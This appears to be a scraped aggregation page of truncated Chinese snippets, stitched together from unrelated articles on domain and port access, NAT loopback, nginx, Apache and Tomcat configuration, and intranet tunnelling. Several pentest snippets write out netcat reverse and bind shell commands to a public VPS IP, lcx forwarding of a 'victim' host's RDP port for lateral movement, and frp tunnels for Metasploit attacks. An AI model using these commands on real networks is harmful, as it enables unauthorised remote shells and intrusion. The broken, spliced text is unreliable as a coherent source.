出现了一个问题:在外网利用域名+端口号可以正常访问到公司的服务,在公司内网的时候访问却没办法利用域名访问,只能用IP才能访问到相关服务 找了一些资料,总结原因如下: 例:在公司内网访问: 访问者:...代号A 被访问者:代号B 路由器:代号R 由于在做DDNS时,在路由器上会把B绑定为公网IP,所以在访问者A访问域名时,解析出来的公网IP,这时候发送的包: 源地址为:A的内网IP,目的地址为:...SYN为1 在路由器上路由表对应的设备为访问者B,所以路由器会把包丢到被访问者B上,B收到包后会回应一个包: 源地址为:B的内网IP,目的地址为:A的内网IP。...SYN=1,ACK=1 这时候,A就收到了一个源地址为:B的内网IP,目的地址为:A的内网IP的包,在A的请求记录中没有发送给B的内网IP的包,所以A认为这是一个错误的包,于是A就把包丢弃,继续等待公网...IP回应的包,直到等待超时, 在B上,也一直等待A回应的TCP包,直到等待超时 如下图: 由于TCP三次握手没有完成,所以内网通过域名访问不到内网资源,造成了NAT回流 (NAT回环) 解决方法如下所示
/nginx -s reload 最主要的地方就是配置好location的地址 当我们输入域名之后加上/test1的时候,就会被nginx映射到我们域名:8080/test1路径上去做请求.
在一个服务器上部署多个站点,需要开放多个端口来访问不同的站点,流程很简单,调试花了2小时,记录一下: 主域名多端口访问 在DNS NameServer设置A记录 将 www.xxx.com 指向服务器ip...开放所需端口,修改nginx配置文件 比如我们有两个服务分别开放在80端口和8080端口 如果有iptable,先开放端口: 1 2 iptables -A INPUT -ptcp --dport 80...expires 7d; access_log off; } } 关键就是两个server段配置,你也可以把这两段拆成两个配置文件,放到 1 /etc/nginx/conf.d/ 目录下面; 子域名多端口访问...这种访问比较傻,因为你的8080端口的访问需要 http://xxx.com:8080 这样的格式; 而且如果有两个不同的cgi,比如80端口对应一个php web服务, 8080端口对应一个nodejs...这个时候我们需要Nginx的反向代理功能,并在DNS Server上面增加一条A记录,最终实现 www.xxx.com 访问80端口 A.xxx.com 通过nginx转发访问8080端口服务 增加一条
enmmmmmmmmmmmm 缘由: 最近搭建了一个 云图床 想着免费给大家用 正好家里有一台 NAS 上面有一块空盘 用来做图床的存储空间 采用FTP存储 家里的宽带是联通动态公网采用端口映射实现外网访问...图片上传以后从NAS盘上返回带端口的图片链接,昨天一个朋友在使用中说图片外链没开启ssl导致网站显示不安全 所以今天研究了一下ssl更换端口的问题 实操: 先去申请一个ssl 配置在要使用的网站那里... 嗯.....我网站绑定的域名 内外端口保持一致....图片 1588325229684094.png 然后去下面的配置文件修改去 修改第四行(看下面) 10086 为你要外网访问的域名 修改完成后点击保存就可 下次访问HTTPS的时候在后面加上你修改的端口号即可
前言 上一篇我使用了宝塔的Supervisor管理器部署了Panlndex,部署完之后在进行反代,发现域名可以访问,ip+端口也能访问,我就在想怎么关闭IP+端口访问,据说安全一点,我百度了很久,百度上全是说怎么防止恶意解析的...,过程很复杂,我就想关闭这个项目的ip加端口访问,感觉应该不会那么复杂。...过程 我就去项目地址问项目作者,他告诉我搜索nginx ip黑名单 我就行百度发现nginx ip黑名单 是禁止指定IP访问我的项目,不是把我的项目IP加端口访问关闭,还是不行。...,后来我才想明白,网站端口都是443,80的,反代的是服务器本地的端口,不让外网访问,直接拒绝请求端口就行了,我想的太复杂了,怪不得网上搜不到。...操作 直接打开宝塔后台安全,删除放行的5238端口就行了,这样ip加端口就不能访问,域名可以访问 挺简单的一个事情,让我想的太复杂了。
域名:aicourenao.comclb的vip:139.155.65.86后端rs公网IP:162.14.81.152具体问题现象:域名接入clb,443端口健康检查异常,域名访问502;域名直接解析到后端...rs访问正常。...如下:端口检查异常:图片域名访问502:图片域名直接解析到后端rs访问正常:图片处理方式:1、最直接的是去掉IIS配置里的【需要服务器名称指示(N)】√即可。
,我们就可以直接配置域名访问了 域名可以访问ip无法访问 在Tomcat下面配置域名(如:www.zjhuiwan.com)的时候,同时又不希望客户通过我们网站的IP或者域名访问到Tomcat默认的ROOT...(www.zjhuiwan.com) 的时候映射到的目录和默认的网页(如:index.jsp) 并且可以同时配置多个,也可为同一个项目配置域名和IP访问 5、最终我们要在本地访问域名,因无域名解析服务器...WINDOWS/system32/drivers/etc/hosts 加上 127.0.0.1 www.zjhuiwan.com (注意:去掉“#”) 6、启动Tomcat服务器,就可以直接敲入域名访问你要访问的地址了...可以通过HTTP地址(即常说的“网址”)加“: 80”来访问网站,因为浏览网页服务默认的端口号都是80,因此只需输入网址即可,不用输入“: 80”了。...II.问题描述: 80端口是一个最为频繁访问的端口号,甚为程序员开发更是经常遇到,比如我们最熟悉的数据库系统服务进程就是默认访问该端口的,还有比如Ngnix服务器默认端口也是80,所以当使用ngnix
注意:前提是公网域名通过备案和域名解析 图片 1.安装nginx yum install -y nginx 2.找到安装nginx.conf文件 server { listen
工具使用 反向连接 场景概述: A主机外网 无法访问B内网机器 B内网机器 可以访问A外网机器 A:103.45.99.224(公网vps) ? ? B: 10.211.55.4(内网机器) ? ?...B:内网执行 Nc.exe 103.45.99.224 8787 ? ? 此时A主机公网vps就会收到B内网主机的cmd ? ?...正向连接 场景概述: A内网 可以访问 外网B B外网 不能访问 内网A 在外网B主机上执行nc -l -p 5555 -e cmd.exe ? ?...随后在内网A上执行nc –nvv 103.45.99.224 5555 ? ?...注:如果客户端【相当于内网】连接服务器【相当于外网】,想获取服务器的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想获取客户端的shell,那么称为反向shell,另外有关于nc在
工具介绍 Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1...工具使用 Windows 内网主机上执行:lcx.exe -slave 例: 将内网主机(10.211.55.3)的3389端口转发到公网主机...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 公网vps尝试访问8989端口 ? ? Linux 内网主机上执行: ..../portmap -m 3 -h1 -p1 -h2 -p2 例: 将内网主机(172.17.0.13)的22端口转发到公网主机(103.45.99.224...)的9898端口 ?
在渗透测试过程中,我们经常会用到端口转发,利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。...在没有端口转发的情况下外网主机是不能直接连接内网主机的,但是lcx工具可以将内网主机(出入内网主机的需要能够ping通互联网)的某个端口抓发到外网的某个端口上面,这样的话处于外网的主机可以将映射到外网的端口再反弹到另一个外网的端口上面...我们本地远程连接192.168.205.1:1234,就可以访问到内网主机,这样我们就可以远程登陆内网服务器,进行内网的横向扫描(请勿非法使用): ? ?...第一步:我们将代理脚本上传到目标服务器,在浏览器访问代理脚本是否被解析: ?...我们将代理脚本上传到目标服务器,在本地访问代理脚本 ? 这样我们执行一下三条命令就可以成功将目标主机的3389端口代理到本地的1234端口,本地连接1234端口就可以登陆内网服务器。
在实际工作环境中,经常有这样的网络环境,如图所示: 机器A(比如跳板机、堡垒机)和机器B处于同一个内网环境,机器A有外网IP,可以供我的机器访问,但是我还想通过自己的机器访问机器B。...显然直接访问不了。...SecureCRT有个端口转发的功能,可以实现这样的需求,就以图中的IP为例: 在我的机器上,先使用SecureCRT通过ssh连接到机器,连接之后,打开SecureCRT的《选项->会话选项》,点击”...端口转发”, 然后点击”添加”按钮,弹出“本地端口转发属性”的对话框,在这里需要填入如下内容: 点击“确定“之后,SecureCrt端口转发的配置已经完成了,如图: 我们在本地就可以调用远程服务器内网的某个端口了... 上,如图: 注意事项: 跳板机和内网的服务器网络必须通畅,内网之间端口能通讯不被防火墙阻止; 端口转发的时候SecureCrt和远程跳板机之间保持连接,不能断开。
工具介绍 Frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。...= admin #HTTP代理端口 vhost_http_port = 10080 #HTTPS代理端口 vhost_https_port = 10443 然后运行....如上图所示则表示运行成功,此时你可以访问vps的ip:7500 ,账号密码为之前所设置的 ? ?...#服务名称(自定义) [ssh] #转发协议类型 type = tcp #本地地址 local_ip = 127.0.0.1 #本地端口 local_port = 22 #远程端口 remote_port...此时frp隧道已经建立成功,可以通过访问vps的ip:7001就相当于访问了本地的22端口
一、nginx 域名绑定 域名 nginx绑定多个域名可又把多个域名规则写一个配置文件里,也可又分别建立多个域名配置文件,我一般为了管理方便,每个域名建一个文件,有些同类域名也可又写在一个总的配置文件里...默认文件 root /home/www/msn.itblood.com; #网站根目录 include location.conf; #调用其他规则,也可去除 } 三、不带www的域名加...301跳转 如果不带www的域名要加301跳转,那也是和绑定域名一样,先绑定不带www的域名,只是不用写网站目录,而是进行301跳转,如: server { listen 80; server_name...端口 server { listen 80; server_name taqing.me www.taqing.me; ##,绑定域名 location / {...proxy_pass http://127.0.0.1:8000; ## 指定端口号 8000 }
目标 CentOs7下搭建Tomcat服务,配置访问Tomcat服务的网址和修改端口号 ?...7.使用Windows下浏览器访问Tomcat服务器:http://192.168.81.133:8080/,出现如下界面安装成功 ? ?...=============================================================================================== 配置域名访问...,修改端口号(这里以wget安装后为例) 1.修改server.xml: vim /usr/local/tomcat/conf/server.xml ?...修改三处: 1.1 把80改为例要修改的端口号 ? ? 1.2 把localhost改为你设置的域名 ? ? 1.3 把localhost改为你设置的域名 ? ?
一,简单配置方法: 1、记录类型选择隐形URL 2、记录值解析到一级域名对应的端口 (阿里云的好像不太灵) 二、Apache配置代理: 1、http.conf: NameVirtualHost *:...transcode.cccc.top:8881/" ProxyPassReverse "/" "http://transcode.cccc.top:8881/" 三、加一个
两种方式 第一种:通过不同端口访问 首先更改/etc/apache2/ports.conf具体如下: # If you just change the port or add more ports here...See /usr/share/doc/apache2.2-common/NEWS.Debian.gz and # README.Debian.gz #增加三个端口80、8080、82、****为你的IP.../sitea-available oj 然后重启下 sudo /etc/init.d/apache2 restart 第二种方法用域名绑定 在/etc/apache2/sites-available/下增加配置文件...#ServerName www.example.comt #填写你的域名 Servername www.acmteam.win ServerAdmin webmaster...oj 最后重启apache sudo /etc/init.d/apache2 restart 原创文章,转载请注明: 转载自URl-team 本文链接地址: 配置apache2使用不同端口或者域名访问网站
点击上方“蓝字”关注我们 Frp实现端口转发内网穿透 准备工作 1.1 frp是什么 简单地说,frp就是一个反向代理软件,它体积轻量但功能很强大,可以使处于内网或防火墙后的设备对外界提供服务,它支持HTTP...1.2 需要工具 搭建一个完整的frp服务链,我们需要 VPS一台(也可以是具有公网IP的实体机server) 访问目标设备(就是你最终要访问的设备本文使用kali Client) Server服务端配置...“dashboard_port”是服务端仪表板的端口,若使用7500端口,在配置完成服务启动后可以通过浏览器访问 x.x.x.x:7500 (其中x.x.x.x为VPS的IP)查看frp服务运行信息。.../frps -c frps.ini & 此时访问 x.x.x.x:7500 依然可以打开仪表板界面,至此,服务端即设置完成, 查看jobs;杀掉进程ps -aux | grep frps 然后kill...内网穿透+ Metasploit渗透windows,所以这里不提及免杀并且关闭防护软件。
外网访问内网Tomcat 本地安装了Tomcat,只能在局域网内访问,怎样从外网也能访问本地Tomcat? 本文将介绍具体的实现步骤。 1....1.2 安装并启动Tomcat 默认安装的Tomcat端口是8080。 2....bin Windows系统平台: 双击startup.bat或者打开CMD控制台,进入目录下执行命令:startup.bat Linux系统平台: 执行命令: sh startup.sh 2.4 访问映射后的公网地址...浏览器里输入如下URL,就可从外网也能访问本地Tomcat了。
外网访问内网SpringBoot 本地安装了SpringBoot,只能在局域网内访问,怎样从外网也能访问本地SpringBoot? 本文将介绍具体的实现步骤。 1....1.2 安装并启动SpringBoot 默认安装的SpringBoot端口是8080。 2....bin Windows系统平台: 双击startup.bat或者打开CMD控制台,进入目录下执行命令:startup.bat Linux系统平台: 执行命令: sh startup.sh 2.4 访问映射后的公网地址...浏览器里输入如下URL,就可从外网也能访问本地SpringBoot了。
领取专属 10元无门槛券
手把手带您无忧上云